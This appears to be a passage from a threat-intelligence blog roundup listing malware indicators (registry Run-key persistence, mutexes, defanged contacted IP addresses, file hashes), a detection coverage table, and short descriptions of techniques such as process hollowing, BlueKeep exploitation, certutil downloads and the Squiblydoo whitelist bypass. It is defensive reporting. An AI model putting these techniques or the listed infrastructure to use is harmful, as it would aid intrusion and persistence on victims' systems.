<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 26
<HKCU>\SOFTWARE\LJHTFCNR
Value Name: dhwucukt
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fqgfwbsp
3
<HKCU>\SOFTWARE\RDIBFLGD
Value Name: tptpmlvu
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hqlpxgip
2
<HKCU>\SOFTWARE\RFPNSTHW
Value Name: mrvrrvei
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: njcelksc
1
<HKCU>\SOFTWARE\SABHCWOL
Value Name: ikvpbrea
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: efukhihs
1
<HKCU>\SOFTWARE\KNKMASGL
Value Name: unvndjfo
1
<HKCU>\SOFTWARE\EKTCABSE
Value Name: wxnvcnos
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lujqtbin
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: tuadafle
1
<HKCU>\SOFTWARE\WMXHUOBW
Value Name: pwqaoveb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: rfvjtqro
1
<HKCU>\SOFTWARE\XJJDLCWW
Value Name: xnffcgsq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: qberplug
1
<HKCU>\SOFTWARE\RTFOELRR
Value Name: jwqogfou
1
<HKCU>\SOFTWARE\EFCGURQI
Value Name: bwxpjjan
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: exlkscqa
1
<HKCU>\SOFTWARE\JOQPBVDH
Value Name: agqfeehb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ditdkksa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hqxdfeff
1
<HKCU>\SOFTWARE\WALMTWQU
Value Name: ktkftafd
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: olgicsmm
1
Mutexes Occurrences
aaAdministrator 26
abAdministrator 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
130[.]60[.]202[.]71 20
5[.]249[.]139[.]132 20
69[.]64[.]36[.]244 18
16[.]156[.]201[.]237 16
5[.]175[.]166[.]35 16
85[.]12[.]29[.]251 15
110[.]77[.]220[.]66 14
198[.]57[.]165[.]46 11
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 26

File Hashes

00d10bcbdb3460ee4efa7d9e6658cb27b68d5bb3dd7d6a8ca220f3c7d10931be 025ef7f7c559d6c277e4589dc152ecc0d7534aa74682439f4a1798814710a569 0316a60c065edc2ea7aa83e9ae604910ff81fb62029db54a2aae66db676ea05c 059eeed1e6b058b4a43b162f8f244c812b5b2a65066db5c0c41be8046c6e3569 07e3fa597c9ae0edff495134f4124b5e83a5b40b0c123e755175f69d2eb26a7e 0aa7443491a039aa57dd5e9c155125ce55f98ba956f958a2139dab653c78bbc8 0d541e97cef73974803dc0cf23d51fa91c7ea09f29fd42c79fe6bc19e752c08d 0ff3dab1766af10bdfeba17efd54a173d2782a5e95a6fd500e66fc8b245caa48 107cb9fdbc3a73ffb1a45dfda0be686754330c502fb06ce78b83bf120c76b8d5 12d46192f1c424e1b67ff4fedbf4c6fa3fa8db10f63e594661b26375e570b092 15e52ff7cf29e5d73edd8c49461246f77c4dd1c1280a33acd13dffe3a75d9e0d 178034886bedbea5278857f16a9d315be5c7ff9133b8601e782f201c8332fec8 1a0dd7a5ea590b06adf5bb66b5721f408de6ab5e8e665c12cf23944638506a5a 1a28d22469b8775f7967d057c5bce86486c335874848c5bcc0c53b7d1befbb83 1b88af4b43762b6a8396e38393219d37fc6025cd10c63cdba6ef606946a54700 1e0a671250656da0f526b3f3fac6408f1d976e8e7b7ce3cef859293374ed42b6 1f412866f9de22a99c90574701b8504d336a34266f11edf35cf9a1bfb3cbce09 1f900859bb44152b05fa1f1d61d31fcdfaa9751830bb99702028be33aab1a1ba 22521d2488cf8a869363e927bd069083f8b98d8f2dc389fd18916c4ccf988992 22d8acdb92968d7923d4de1497b15c6996c37494631f7823023035ece3b6fd75 25195a7e1aa4bc71d2dd3367c0c5343765213d835edd9dbfb01800c66c687b77 26cd915a0e732704b90de3315356ec5473b79df8523817086257e9efc355a8d7 2916fdb8c4628cbb9ec5f1e92df22cc275cd806f8a6335b1c76b4b4a3c36f06c 29c0e53be2aa94d89184ac8bd6508ce4b62f3cc32d73f31febb3a40c352c5470 2aa9f5c7c1853e56bd9f950d64c34ab21029bf4f7369355aac4caac6db597125
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Dealply adware detected - (6479)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Process hollowing detected - (2465)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
CVE-2019-0708 detected - (2213)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Smoke Loader detected - (1739)
Smoke Loader has been detected. Smokeloader is used mainly to execute other malicious software, like ransomware or cryptocurrency miners. Its initial infection vector is usually an email with a malicious Microsoft Word document or delivered through an exploit kit. Smokeloader uses various plugins designed to steal data from its victims, particularly credentials stored on the system or transfered over HTTP, HTTPS, FTP, SMTP, POP3 or IMAP.
Certutil.exe is downloading a file - (1073)
The certutil.exe utility has been detected downloading and executing a file. Upon execution, the downloaded file behaved suspiciously. The normal usage of certutil.exe involves retrieving certificate information. Attackers can use this utility to download additional malicious payloads.
Crystalbit-Apple DLL double hijack detected - (1013)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Installcore adware detected - (779)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Kovter injection detected - (617)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Excessively long PowerShell command detected - (513)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Squiblydoo application whitelist bypass attempt detected. - (321)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.